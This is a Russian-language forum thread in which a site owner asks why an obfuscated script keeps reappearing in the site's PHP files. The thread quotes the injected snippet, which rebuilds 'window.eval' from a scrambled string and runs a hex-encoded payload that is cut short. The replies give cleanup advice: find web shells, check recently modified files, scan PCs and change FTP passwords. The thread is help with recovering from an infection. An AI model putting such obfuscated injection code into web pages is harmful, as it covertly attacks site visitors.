Привет товарисчи кодеры и другие кибер-маньяки :)
Всплыла проблемка у меня с сайтом. начал находить периодически в некоторых фаилах сайта (.php) вот такую вот строчку:
<div id='x0d65a24088ed1686437f1ee911ceeb9a0'><script>var jQuery = eval('w%i^nyd^ohw%.^e^v%ahly'.replace(/[\^s%yh]/g, ''));
jQuery('\x66\x75\x6e\x63\x74\x69......x25\x37\x31\ x27\x29\x3b');</script></div>


Пароль на хосте меняли. Дыры вроде все позакрывали. Что-бы это могло быть и как могло заразить?
Заранее спасибо!

Менять пароль на хосте я бы стал менять в посленюю очередь .. сначал шеллы чтоль повыдерал бы ... да файлы протрояненые

шеллы повыдерать - а это как, в двух словах? :)
фаилы протрояненые - т.е. файлы в которых был найден этот код? а просто удаление кода не спасёт что-ли?

Удли коды, поставь необходимые права на файлы, проверь комп на вирусы (и все админы пусть сделают тоже самое) и поменяй пароли на всё остальное (фтп...)

если олени ломали тебя,ищи файлы с недавним временем редактирования.которые ты не мог редачить в это время,их и копай! меня все пасы,живи щасливо :)

Та код я удалял уже из фаилов. после чего закрыл дыры (найденые) и поменял пароль. Однако через какое-то время всё повторилось.

p@tison
Шелл поищи. Что такое шелл и как его искать => расширеный поиск (http://forum.antichat.ru/search.php?)

ищи файлы с недавним временем редактирования

могли сломать через хостера,возможно там стоит бажное ядро

Была давно такая тема с сайтом. Если используешь Total Commander и ему подобные, то меняй пароль и не сохраняй его в проге... там все автоматом действует (етот вирус)

а к логам доступа последнее время не предоставляют?

фреимы поставили :)